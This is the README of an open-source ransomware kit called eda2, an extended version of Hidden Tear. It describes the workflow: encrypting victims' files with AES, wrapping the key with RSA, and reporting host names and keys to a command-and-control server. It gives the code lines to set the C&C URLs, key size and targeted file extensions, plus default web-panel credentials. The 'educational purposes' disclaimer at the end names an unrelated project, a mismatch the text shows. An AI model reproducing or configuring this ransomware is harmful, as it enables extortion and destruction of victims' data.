_ ___
| | |__ \
___ __| | __ _ ) |
/ _ \/ _` |/ _` | / /
| __/ (_| | (_| |/ /_
\___|\__,_|\__,_|____|
It's a ransomware-like file crypter sample which can be modified for specific purposes. It's more extended version of hidden tear.
Features
- Uses both RSA and AES algorithms.
- Coordinates with a Command&Control server.
- Uses CSPRNG
- Uses phplibsec
- Encrypted files can be decrypted in decryption program with encryption key.
- Changes desktop background.
Demonstration Video
https://www.youtube.com/watch?v=PD16u1Rz2QI
Workflow
- Program sends a POST request to the C&C server with pcname and username variables.
- C&C server creates RSA public/private key pair. Sends public key to the program, saves private key inside the Mysql database
- Program creates a random key for AES algorithm
- Program encrypts files with AES algorithm
- Program encrypts AES key with RSA public key and sends it to the C&C server with POST request
- C&C server saves encrypted AES key inside the Mysql Database
Usage
-
You need to have a web server which runs Php and Mysql. Change this line with your URL
string generatorUrl = "http://www.example.com/panel/createkeys.php"; string keySaveUrl = "http://www.example.com/panel/savekey.php"; -
It uses 2048 as RSA key size. You can change it
const int keySize = 2048; -
Target file extensions can be change. Default list:
var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"}; -
Edit your database settings in db.php
-
Default login credentials for web panel: username:test password:test
-
You can use Hidden Tear's decryption program to decrypt files.
While this may be helpful for some, there are significant risks. nats_authorization_server may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running nats_authorization_server, even though you are innocent.